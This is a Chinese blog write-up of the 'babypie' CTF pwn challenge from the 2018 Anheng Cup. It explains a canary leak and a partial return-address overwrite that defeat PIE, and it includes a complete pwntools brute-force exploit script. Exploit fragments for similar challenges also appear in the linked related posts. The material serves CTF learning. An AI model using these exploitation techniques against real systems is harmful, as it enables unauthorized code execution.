2018 - 安恒杯 - babypie [stack partial overwrite]

最新推荐文章于 2022-11-19 20:42:23 发布
最新推荐文章于 2022-11-19 20:42:23 发布
阅读量1.2k 收藏
点赞数
分类专栏: CTF之旅 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kevin66654/article/details/87213418
版权

明显的是缓冲区溢出呀,read函数可以多读

64位程序,开启了NX和PIE,且程序里有了system("/bin/sh")

目标:控制RIP到A3E函数即可~

首先,要处理canary的问题~然后,覆盖返回地址~

partial overwrite:在开启了PIE后,无论高位地址如何变化,低位地址是不变的,意味着有概率“撞到”正确的地址

exp如下:

#!/usr/bin/env python
# coding=utf-8

from pwn import *

while True:
    try:
        io = process("./babypie", timeout = 1)
        io.sendafter(":\n", "A" * (0x30 - 0x8 + 1))
        io.recvuntil("A" * (0x30 - 0x8 + 1))
        canary = '\0' + io.recvn(7)
        success("0x" + canary.encode("hex"))
        io.sendafter(":\n", "A" * (0x30 - 0x8) + canary + "B" * 8 + '\x3E\x0A')
        io.interactive()
    except Exception as e:
        io.close()
        print e

参考链接:

https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/fancy-rop/#partial-overwrite

Flying_Fatty
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2019.7.22 babypie(canary绕过)和一些调试技巧
DSR446的博客
08-12 864
1. 以上是程序的反编译代码和保护机制。我们可以看出他开了canary保护。我们运行一下程序,发现只要输入一定数额的字符,其可以保持正常功能。 2.canary总是保存在bp的上面,意是我们虽然开辟了48字节的空间,但真正能写的只有40字节。最近遇到一个pwn大佬,跟着他学到了很多gdb调试的技巧,我想把它结合这个题目记录下来。 3. 我们可以在代码中加入gdb.attach(io,’’),让程...
2018 6月安恒杯月赛
weixin_40423072的博客
09-03 1836
更一下比赛的 解析吧。安恒杯的 三题web,唔,平台关了所以,链接就 随缘了! 第一题 嗯,遇到就点吧,点击的时候页面不会跳转但是还是会有反应的,如果右键打开之后会有新的路径,后面有跟一个microsoft 的教程。那 这题就是一个 注入吧 但是常规注入并不能注入进去,无奈。Redis的注入也没有,于是看了解析之后我们就很自然的可以想到MongoDB注入,怎么说呢。只要想到他就能做出来,百度一...
2018 强网杯 安恒杯 部分write up
ayg14593的博客
03-27 298
蜘蛛侠啊 安恒杯misc linux tshark identity 部分指令 附件下载 https://pan.baidu.com/s/1uo0GFufTjMqR8rtBzp5PlQ 密码 2cq5 首先打开附件pcap包 茫茫多的icmp包 稍微看一下似乎每个包内容都不太一样 但是 $$START$$ 似乎暗示了什么 看看最后一个ICMP...
2018 安恒杯 6 月 pwn - over
Maxmalloc的博客
10-06 1781
题目链接 找不到了 先用ida分析一下 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { setvbuf(stdin, 0LL, 2, 0LL); setvbuf(stdout, 0LL, 2, 0LL); while ( sub_400676() ) ; return 0LL; } int su...
linkctf_2018.7_babypie
qq_36918532的博客
04-18 781
linkctf_2018.7_babypie 检查安全保护,64位,保护全开 IDA: 并且存在后门,,但是地址都随机化了,不能够直接填写地址,需要通过与固定函数的偏移 可以看到把rbp泄露出来了,同时前面一个地址,不知道是不是canary(按理说会放在ebp-8的位置,也就是前面这个,但是canary一般是以00结尾的,这个没有00的原因是,不能写入那么多字节,由于’\x00’被覆盖掉了,如果不覆盖掉的话就会截断,后面的就不会打印出来了)现在要做的就是要把canary如何打印出来,或者是绕过,或者是劫持_
2018-10月安恒逆向题目
10-29
2018年10月安恒月赛逆向题目。
20210413-东北证券-安恒信息-688023-云安全龙头厂商,充分受益行业高景气.pdf
04-14
20210413-东北证券-安恒信息-688023-云安全龙头厂商,充分受益行业高景气.pdf
安恒杯-misc-附件资源
03-05
安恒杯-misc-附件资源
20200310-天风证券-安恒信息-688023-新安全领军企业,收入有望持续高增长.pdf
06-19
20200310-天风证券-安恒信息-688023-新安全领军企业,收入有望持续高增长.pdf
企业-安恒信息-2020年年终总结.rar
09-15
【标题】:“企业-安恒信息-2020年年终总结.rar”是一个关于安恒信息公司在2020年度的工作总结的压缩文件。这个标题表明了文件的主要内容是安恒信息公司对于过去一年运营、业务发展、技术创新、市场表现等各方面的...
buuoj刷题记录 - linkctf_2018.7_babypie
qq_34010404的博客
03-18 281
检查程序保护: 拖进IDA看一下,只有一小段代码,存在溢出漏洞 main函数上面有个后门函数 覆盖ret地址到后门函数即可,由于开启了PIE,和Canary,不能直接溢出 下面这两行代码可以把canary打出来 最后由于后门函数入口地址和返回地址只有低字节不同,所以覆盖掉返回地址的低字节即可.,不需要获取程序基址. exp: from pwn import* #sh = process('./pwn') sh = remote('node4.buuoj.cn',29231) payload = b'
[HarekazeCTF2019]baby_rop
、moddemod
06-12 391
exp from pwn import * context(log_level = 'debug') proc_name = './babyrop' elf = ELF(proc_name) # p = process(proc_name) p = remote('node3.buuoj.cn', 25587) pop_rdi_ret = 0x400683 bin_sh_str = 0x601048 system_addr = elf.sym['system'] payload = 'a'.en...
partial overwrite
最新发布
FUCKING12的博客
11-19 783
就是partial overwrite,个人理解就是栈上有一个地址,这个地址和你想利用的地址又十分相近,只差1,2个字节于是就可以通过爆破这1,2个字节来达到利用的目的。此题开了pie canary,有个后门函数,然后思路就是栈溢出到system这,泄露canary这参考。栈上ret处的地址我们可以爆破最后2个字节,来ret到getshell这个函数的地址来得到shell。栈溢出到system需要用到一个利用手法。
花式栈溢出
m0_49959202的博客
10-04 688
文章目录花式栈溢出1.原理1.1 stack pivoting1.2 栈迁移(frame faking)1.2.1 gadget介绍1.2.2 栈(payload)布置1.2.3 步骤分析stage 1:stage 2:stage 3:stage 4:stage 5:stage 6:其他栈迁移方式:1.3 Stack smash1.4 partial overwrite2.例题2.1 stack pivoting2.1.1 习题信息2.1.2 程序分析2.2 栈迁移(frame faking)2.2.1 习
花式栈溢出技巧----partial overwrite
qq_42192672的博客
10-18 1198
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#partial-overwrite                   https://bbs.ichunqiu.com/thread-43627-1-1.html                   https://www.jianshu.com/...
CTF-安恒19年二月月赛部分writeup
weixin_33968104的博客
02-26 1643
CTF-安恒19年二月月赛部分writeup MISC1-来玩个游戏吧 题目: 第一关,一眼可以看出是盲文,之前做过类似题目 拿到在线网站解一下 ??41402abc4b2a76b9719d911017c592,那么就奇怪了,这个??是什么东西,数一下加上??正好32位,应该是个MD5了,索性直接百度一下, 第一关答案出来了,试过了MD5值不对,hell...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值